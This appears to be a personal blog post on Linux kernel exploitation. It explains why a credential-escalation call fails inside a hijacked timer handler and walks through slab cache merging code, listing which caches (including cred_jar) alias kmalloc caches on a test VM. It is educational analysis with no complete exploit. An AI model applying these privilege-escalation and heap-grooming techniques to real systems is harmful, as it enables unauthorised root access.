Don't Share Your Code
the code above has nothing to do with programing, the password instead

Essential and Pitfall for Linux Kernel Hacking

In this blog, I will share some interesting essential and pitfalls I faced when exploiting Linux kernel. Hope this can help you to handle similar probelms. :)

In addition, I will keep updating this blog as well as keep learning and hacking.

Watch out task_struct context

The serious thinking of this happened when I struggled in getting privilege escalation when designing a kernel heap exploit challenge (for the course final exam as a teacher assistant). A short story of this can be concluded as a simple question.

Below is a partial code of a vulnerable device driver.

init_timer(&timer);
timer.function = &CONTROLABLE_FUNCTION_PTR;
timer.expires = jiffies + 2 * HZ;
timer.data = 0;
add_timer(&timer);

As you can see, we can change the CONTROLABLE_FUNCTION_PTR to achieve PC hijacking, redirecting the control flow.

Here comes the question, ignoring SMEP and SMAP or likely protection, if we redirect the control flow to user-space backdoor commit_creds(prepare_kernel_cred(0));. Can it takes effect and spawn a root shell for us? Think about that by yourself.


Okay, the answer is unfortunate NO. Why? It’s something deal with the context when executing this backdoor function.

In a nutshell, infamous commit_creds(prepare_kernel_cred(0)); can only be effective when the executing process is the one you later will expect for launching a system("/bin/sh). However, in this case, your process context just registers a backdoor function instead of executing it.

So, which process will take the responsibility to execute your backdoor?

The answer is no idea :D. In fact, it depends on the Linux scheduling mechanism and the time delay. The task which owns the CPU when the timer has to handle the interrupt correctly. It can be your expected exploit process, also can be not.

The code trace for processing timer handler is run_timer_softirq(), __run_timers(), then your malicious function.

A little far away from exploiting now…. Anyway, the commit_creds(prepare_kernel_cred(0)); won’t work, so we have to leak the current task_struct and try to use ROP chain technique to adopt arbitary write to the cred of our process.

Take care kmem_cache alias

There are two blogs of mine have contents related to cache alias optimization in hacking. This time, let us raise its veil this time.

The very fisrt part is in kmem_cache_create().

struct kmem_cache *
kmem_cache_create(const char *name, size_t size, size_t align,
		  unsigned long flags, void (*ctor)(void *))
{
	struct kmem_cache *s = NULL;
	const char *cache_name;
	int err;

	get_online_cpus();
	get_online_mems();
	memcg_get_cache_ids();

	mutex_lock(&slab_mutex);

	err = kmem_cache_sanity_check(name, size);
	if (err) {
		goto out_unlock;
	}

	/*
	 * Some allocators will constraint the set of valid flags to a subset
	 * of all flags. We expect them to define CACHE_CREATE_MASK in this
	 * case, and we'll just provide them with a sanitized version of the
	 * passed flags.
	 */
	flags &= CACHE_CREATE_MASK;

	s = __kmem_cache_alias(name, size, align, flags, ctor);     // HERE!
	if (s)
		goto out_unlock;

If __kmem_cache_alias() returns a non NULL value, kmem_cache_create won’t further calling cache_create but adopts alias optimization. This technique can help to mitigate the fragamentation in slub allocator.

In that function, it tries to find a proper existing kmem_cache to merge.

struct kmem_cache *
__kmem_cache_alias(const char *name, size_t size, size_t align,
		   unsigned long flags, void (*ctor)(void *))
{
	struct kmem_cache *s, *c;

	s = find_mergeable(size, align, flags, name, ctor);
	if (s) {
        /* ... */
	}

	return s;
}

How to decide a target kmem_cache in the linked list is suitable or not to merge? The function find_mergeable takes in charge of that. We partition this function into several parts for better understanding.

// Part-1
struct kmem_cache *find_mergeable(size_t size, size_t align,
		unsigned long flags, const char *name, void (*ctor)(void *))
{
	struct kmem_cache *s;

	if (slab_nomerge || (flags & SLAB_NEVER_MERGE))
		return NULL;

	if (ctor)
		return NULL;

	size = ALIGN(size, sizeof(void *));
	align = calculate_alignment(flags, align, size);
	size = ALIGN(size, align);
	flags = kmem_cache_flags(size, flags, name, NULL);

    /* ... */
}

It will first check slab_nomerge. Description of this variable is like below.

/*
 * Merge control. If this is set then no merging of slab caches will occur.
 * (Could be removed. This was introduced to pacify the merge skeptics.)
 */
static int slab_nomerge;

As the comment tells us, if this variable is set, all slab caches won’t be merged. (TODO: Which place set or unset this variable?

At the same time, if the input flag is carried with SLAB_NEVER_MERGE. The function will quickly return. The special flag SLAB_NEVER_MERGE is a union of several flags. From my aspect of view, these separate flags are mainly about debugging.

/*
 * Set of flags that will prevent slab merging
 */
#define SLAB_NEVER_MERGE (SLAB_RED_ZONE | SLAB_POISON | SLAB_STORE_USER | \
		SLAB_TRACE | SLAB_DESTROY_BY_RCU | SLAB_NOLEAKTRACE | \
		SLAB_FAILSLAB)

// SLAB_RED_ZONE: (DEBUG) Red zone objs in a cache, non-writeable, detect overflow
// SLAB_POISON: (DEBUG) Poison objects, that is to say when allocating, fill with posion bytes
// SLAB_STORE_USER: (DEBUG) Store the last owner for bug hunting
// SLAB_TRACE: Trace allocations and frees
// SLAB_DESTROY_BY_RCU: Defer freeing slabs to RCU
// SLAB_NOLEAKTRACE: Avoid kmemleak tracing
// SLAB_FAILSLAB: Used to inject slab allocation failures, look at this
// => https://www.kernel.org/doc/Documentation/fault-injection/fault-injection.txt

Make sense, when the new allocating cache is used as debugging or tracing, no merging will be advisable.

In addition, if the ctor or constructor function pointer is not NULL, the function also quickly returns.

What if the constructor is also the same? :(

So far so good, let’s continue reading the code.

	list_for_each_entry_reverse(s, &slab_caches, list) {
		if (slab_unmergeable(s))
			continue;

		if (size > s->size)
			continue;

		if ((flags & SLAB_MERGE_SAME) != (s->flags & SLAB_MERGE_SAME))
			continue;
		/*
		 * Check if alignment is compatible.
		 * Courtesy of Adrian Drzewiecki
		 */
		if ((s->size & ~(align - 1)) != s->size)
			continue;

		if (s->size - size >= sizeof(void *))
			continue;

		if (IS_ENABLED(CONFIG_SLAB) && align &&
			(align > s->align || s->align % align))
			continue;

		return s;
	}
	return NULL;
}

The code thus traverses the slab_caches list to find if any cache is satisfied. The first slab_unmergeable() almost do the same thing that the former part does, while the object is the candidate cache this time.

/*
 * Find a mergeable slab cache
 */
int slab_unmergeable(struct kmem_cache *s)
{
	if (slab_nomerge || (s->flags & SLAB_NEVER_MERGE))
		return 1;

	if (!is_root_cache(s))
		return 1;

	if (s->ctor)
		return 1;

	/*
	 * We may have set a slab to be unmergeable during bootstrap.
	 */
	if (s->refcount < 0)
		return 1;

	return 0;
}

Also some difference occurs, is_root_cache() is something deal with memory cgroup, and the minus refcount is corresponded to bootstrap stage. Remain checking will be go through as a list.

  1. size check: If the object size of the new cache is larger than the candidate one, continue searching.

  2. flag check: The way to compare the flag is a little werid.

(flags & SLAB_MERGE_SAME) != (s->flags & SLAB_MERGE_SAME)
// ...

#define SLAB_MERGE_SAME (SLAB_RECLAIM_ACCOUNT | SLAB_CACHE_DMA | SLAB_NOTRACK)

The comparison tells us that only these three flags are matter in picking a mergeable cache.

  • SLAB_RECLAIM_ACCOUNT: This flag is set for caches with objects that are easily reclaimable such as inode caches. A counter is maintained in a variable called slab_reclaim_pages to record how many pages are used in slabs allocated to these caches. This counter is later used in vm_enough_memory() to help determine if the system is truly out of memory. link
  • SLAB_CACHE_DMA: Allocate slabs with memory from ZONE_DMA
  • SLAB_NOTRACK: Flag to decide whether or not track use of uninitialized memory

Because I haven’t a deep understanding of the development of the entire SLAB management system (especially some debug and check subsystem), I don’t know the reason for this. What we care now is that if the flag of the candidate kmem_cache is the same as the new one when AND with SLAB_MERGE_SAME, the check is passed.

Remain three checkings can be viewed together, as they all related to alignment.

/*
 * Check if alignment is compatible.
 * Courtesy of Adrian Drzewiecki
 */
if ((s->size & ~(align - 1)) != s->size) 	// [*] If the candidate kmem_cache aligned to new align
	continue;

if (s->size - size >= sizeof(void *))		// [*] If the extra space or inner fragmentation is acceptable
	continue;

if (IS_ENABLED(CONFIG_SLAB) && align &&		// [*] If the two alignment here compatible
	(align > s->align || s->align % align))
	continue;

When all the above requirements are satisfied, the candidate kmem_cache is returned for merging.


Now it’s time for thinking about this alias optimization. What do you say? It will do harm to the security or do not? In fact, this can be a double-edged sword. In the CVE-2015-3636, the alias in 32-bit architectures will cause trouble and extra effort for the hacker to control the heap state, while in the CVE-2016-0728, the alias lets the key_jar objects being easily hijacked by the attacker.

I write a simple program to record the alias with kmalloc caches in my v4.4.0 virtual machine (more dangerous in my aspect).

# A alias to B : A -> B
pid -> kmalloc-128
anon_vma_chain -> kmalloc_64
cred_jar -> kmalloc-192 !!
fs_cache -> kmalloc-64
key_jar  -> kmalloc-192
selinux_file_security -> kmalloc-16
avc_xperms_data -> kmalloc-32
names_cache -> kmalloc-4096
flip -> kmalloc-256
task_delay_info -> kmalloc-64
pool-workqueue -> kmalloc-256
skbuff_head_cache -> kmalloc-256
skbuff_fclone_cache -> kmalloc-512
uid_cache -> kmalloc-128
biovec-16 -> kmalloc-256
biovec-64 -> kmalloc-1024
biovec-128 -> kmalloc-2048
biovec-256 -> kmalloc-4096
bio-0 -> kmalloc-192
sgpool-8 -> kmalloc-256
sgpool-16 -> kmalloc-512
sgpool-32 -> kmalloc-1024
sgpool-64 -> kmalloc-2048
sgpool-128-> kmalloc-4096
eventpoll_epi -> kmalloc-128
ip_dst_cache -> kmalloc-256
secpath_cache -> kmalloc-64
inet_peer_cache -> kmalloc-192
tcp_bind_bucket -> kmalloc-64
ip_mrt_cache -> kmalloc-128
rpc_tasks -> kmalloc-256
rpc_buffers -> kmalloc-2048
dnotify_struct -> kmalloc-32
aio_kiocb -> kmalloc-128
nfs_page -> kmalloc-128
sd_ext_cdb -> kmalloc-32
scsi_sense_cache -> kmalloc-128
io -> kmalloc-64
nf_conntrack_expect -> kmalloc-256
fib6_nodes -> kmalloc-64

To be honest, I have no idea about most of these weird kmem_cache name. But the fact is the number is rather large than my expectation. What’s more? we can see that cred_jar and pid and some tasty objects also integrated with kmalloc objects. Is that good news for every kernel hacker?

addr_limit combine with pipefd

TODO

ret2dir stragetegy

TODO